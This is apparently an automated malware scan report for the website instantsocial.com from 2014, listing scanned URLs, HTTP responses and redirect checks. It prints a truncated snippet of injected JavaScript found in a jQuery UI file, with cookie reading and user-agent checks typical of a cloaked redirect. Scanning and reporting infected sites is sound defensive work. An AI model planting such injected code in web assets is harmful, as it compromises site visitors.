Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=instantsocial.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://instantsocial.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 05 Oct 2014 14:16:26 GMT Location: http://www.instantsocial.com/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.instantsocial.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.4 | clean |
http://www.instantsocial.com/ | 200 OK Content-Length: 8187 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js | 200 OK Content-Length: 72174 Content-Type: text/javascript | clean |
http://instantsocial.com/beta/jquery.tipsy.js | 200 OK Content-Length: 8411 Content-Type: application/javascript | clean |
https://apis.google.com/js/plusone.js | 200 OK Content-Length: 12488 Content-Type: application/javascript | clean |
http://instantsocial.com/platform/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 05 Oct 2014 14:16:28 GMT Location: http://www.instantsocial.com/platform/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.instantsocial.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.4 | clean |
http://www.instantsocial.com/platform/ | 200 OK Content-Length: 13660 Content-Type: text/html | clean |
http://www.instantsocial.com/beta/jquery.tipsy.js | 200 OK Content-Length: 8411 Content-Type: application/javascript | clean |
http://instantsocial.com/im-ready/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 05 Oct 2014 14:16:30 GMT Location: http://www.instantsocial.com/im-ready/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.instantsocial.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.4 | clean |
http://www.instantsocial.com/im-ready/ | 200 OK Content-Length: 11892 Content-Type: text/html | clean |
http://www.instantsocial.com/instantDash/ | 200 OK Content-Length: 2084 Content-Type: text/html | clean |
http://www.instantsocial.com/instantDash/signup.php | 200 OK Content-Length: 12295 Content-Type: text/html | clean |
https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.js | 200 OK Content-Length: 183184 Content-Type: text/javascript | clean |
https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.11/jquery-ui.min.js | 200 OK Content-Length: 199641 Content-Type: text/javascript | clean |
http://www.instantsocial.com/instantDash/js/jquery.prettyPhoto.js | 200 OK Content-Length: 17902 Content-Type: application/javascript | clean |
http://www.instantsocial.com/instantDash/js/jquery.ui.core.js | 200 OK Content-Length: 6751 Content-Type: application/javascript | clean |
http://www.instantsocial.com/instantDash/js/jquery.ui.widget.js | 200 OK Content-Length: 7034 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t data = data || {}; if ( event.originalEvent ) { for ( var i = $.event.props.length, prop; i; ) { prop = $.event.props[ --i ]; event[ prop ] = event.originalEvent[ prop ]; } } this.element.trigger( event, data ); return !( $.isFunction(callback) && callback.call( this.element[0], event, data ) === false || event.isDefaultPrevented() ); } }; })( jQuery ); Antivirus reports:
| ||
http://www.instantsocial.com/instantDash/js/jquery.ui.mouse.js | 200 OK Content-Length: 1051 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: instantsocial.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 05 Oct 2014 14:16:26 GMT
Location: http://www.instantsocial.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.instantsocial.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.4
...0 bytes of data.
GET / HTTP/1.1
Host: instantsocial.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 05 Oct 2014 14:16:26 GMT
Location: http://www.instantsocial.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.instantsocial.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.4
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: instantsocial.com
Referer: http://www.google.com/search?q=instantsocial.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: instantsocial.com
Referer: http://www.google.com/search?q=instantsocial.com
Result:
The result is similar to the first query. There are no suspicious redirects found.